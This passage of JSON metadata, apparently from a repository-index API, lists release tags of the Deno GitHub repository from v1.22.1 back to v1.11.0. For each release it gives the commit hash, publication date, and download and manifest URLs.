376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag